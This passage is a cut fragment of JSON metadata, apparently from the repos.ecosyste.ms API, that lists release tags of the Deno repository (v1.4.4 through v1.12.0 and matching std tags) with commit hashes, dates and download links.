b/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://r